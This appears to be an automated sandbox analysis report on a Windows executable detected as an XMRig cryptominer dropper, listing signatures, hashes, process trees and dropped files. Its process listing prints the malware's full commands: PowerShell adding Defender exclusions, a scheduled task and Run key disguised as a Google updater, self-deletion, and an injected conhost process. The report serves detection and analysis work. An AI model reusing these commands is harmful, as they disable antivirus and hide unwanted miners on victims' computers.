Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1799s
  • max time network
    1781s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3428
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1048
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1476
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2576
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:4540
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2120
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:5108
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4148
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3096
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:4512
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:2192
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe qtdiqnkejoz
              2⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Suspicious behavior: EnumeratesProcesses
              PID:5516
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4568
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:1708
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:5472

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            655KB

            MD5

            fe3b09c22108824f3d8f48c5060d919f

            SHA1

            16c73cce99ac28b5dbf504eb765e5ae2972d29cf

            SHA256

            5f4e1d5e48577205e4d5912fddd892a35928fd0ba4927fd1c902cfd2e0e222ae

            SHA512

            21ccc4698d6788bc636f73ad5403789c78faa0ac16dcae99276f5991b7df1853f349834b54708ac548d008893e94f9f461160c4b98004a92e28abca65479e737

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            6d3e9c29fe44e90aae6ed30ccf799ca8

            SHA1

            c7974ef72264bbdf13a2793ccf1aed11bc565dce

            SHA256

            2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

            SHA512

            60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            635e5996db28991f9b5105b5bee8fdca

            SHA1

            65683134b81b1f994f1ceb16e00c979751569e2b

            SHA256

            d17623f3ba80ca3603ea0a05129473793a097ef3f4f2311fa355eb7febfd58ff

            SHA512

            09f4062f6dcbd76922a5424055208e8f97f596bd56e4f607a003a5f05f936e6b968909e56b826d0d27a7aad534ccd57746029412d98e03867ecde532de3a3db0

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nvvatcev.lss.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1048-0-0x00007FF644FF0000-0x00007FF645201000-memory.dmp
            Filesize

            2.1MB

          • memory/1048-34-0x00007FF644FF0000-0x00007FF645201000-memory.dmp
            Filesize

            2.1MB

          • memory/1476-16-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/1476-13-0x000002651C290000-0x000002651C2A0000-memory.dmp
            Filesize

            64KB

          • memory/1476-12-0x000002651C290000-0x000002651C2A0000-memory.dmp
            Filesize

            64KB

          • memory/1476-11-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/1476-1-0x0000026534790000-0x00000265347B2000-memory.dmp
            Filesize

            136KB

          • memory/2120-44-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/2120-46-0x0000026776080000-0x0000026776090000-memory.dmp
            Filesize

            64KB

          • memory/2120-49-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/2192-161-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-147-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-183-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-181-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-179-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-177-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-175-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-173-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-171-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-169-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-167-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-139-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-159-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-157-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-155-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-187-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-137-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-153-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-151-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-149-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-135-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-185-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-133-0x000001B3F6670000-0x000001B3F6690000-memory.dmp
            Filesize

            128KB

          • memory/2192-132-0x000001B3F6650000-0x000001B3F6670000-memory.dmp
            Filesize

            128KB

          • memory/2192-145-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-115-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-114-0x000001B3E6050000-0x000001B3E6070000-memory.dmp
            Filesize

            128KB

          • memory/2192-120-0x000001B3F6630000-0x000001B3F6650000-memory.dmp
            Filesize

            128KB

          • memory/2192-143-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-122-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-123-0x000001B3F6650000-0x000001B3F6670000-memory.dmp
            Filesize

            128KB

          • memory/2192-124-0x000001B3F6670000-0x000001B3F6690000-memory.dmp
            Filesize

            128KB

          • memory/2192-126-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-141-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-128-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-129-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2192-131-0x00007FF7325E0000-0x00007FF732DD4000-memory.dmp
            Filesize

            8.0MB

          • memory/2576-28-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/2576-29-0x00000195C6310000-0x00000195C6320000-memory.dmp
            Filesize

            64KB

          • memory/2576-30-0x00000195C6310000-0x00000195C6320000-memory.dmp
            Filesize

            64KB

          • memory/2576-32-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/3096-108-0x000001C14F540000-0x000001C14F550000-memory.dmp
            Filesize

            64KB

          • memory/3096-107-0x000001C14F540000-0x000001C14F550000-memory.dmp
            Filesize

            64KB

          • memory/3096-96-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/3096-97-0x000001C14F540000-0x000001C14F550000-memory.dmp
            Filesize

            64KB

          • memory/3096-110-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/4148-79-0x0000023A18F60000-0x0000023A18F66000-memory.dmp
            Filesize

            24KB

          • memory/4148-76-0x0000023A7F130000-0x0000023A7F13A000-memory.dmp
            Filesize

            40KB

          • memory/4148-60-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/4148-84-0x00007FFA0DC00000-0x00007FFA0E6C1000-memory.dmp
            Filesize

            10.8MB

          • memory/4148-81-0x0000023A7F0F0000-0x0000023A7F100000-memory.dmp
            Filesize

            64KB

          • memory/4148-80-0x0000023A7F2F0000-0x0000023A7F2FA000-memory.dmp
            Filesize

            40KB

          • memory/4148-61-0x0000023A7F0F0000-0x0000023A7F100000-memory.dmp
            Filesize

            64KB

          • memory/4148-77-0x0000023A7F800000-0x0000023A7F81A000-memory.dmp
            Filesize

            104KB

          • memory/4148-78-0x0000023A18F50000-0x0000023A18F58000-memory.dmp
            Filesize

            32KB

          • memory/4148-71-0x0000023A18D30000-0x0000023A18D4C000-memory.dmp
            Filesize

            112KB

          • memory/4148-75-0x0000023A7F7E0000-0x0000023A7F7FC000-memory.dmp
            Filesize

            112KB

          • memory/4148-74-0x0000023A7F120000-0x0000023A7F12A000-memory.dmp
            Filesize

            40KB

          • memory/4148-73-0x0000023A18D50000-0x0000023A18E05000-memory.dmp
            Filesize

            724KB

          • memory/4148-72-0x0000023A7F0F0000-0x0000023A7F100000-memory.dmp
            Filesize

            64KB

          • memory/4568-116-0x00007FF705840000-0x00007FF705A51000-memory.dmp
            Filesize

            2.1MB

          • memory/4568-50-0x00007FF705840000-0x00007FF705A51000-memory.dmp
            Filesize

            2.1MB

          • memory/5516-127-0x00007FF72A360000-0x00007FF72A376000-memory.dmp
            Filesize

            88KB

          • memory/5516-121-0x00007FF72A360000-0x00007FF72A376000-memory.dmp
            Filesize

            88KB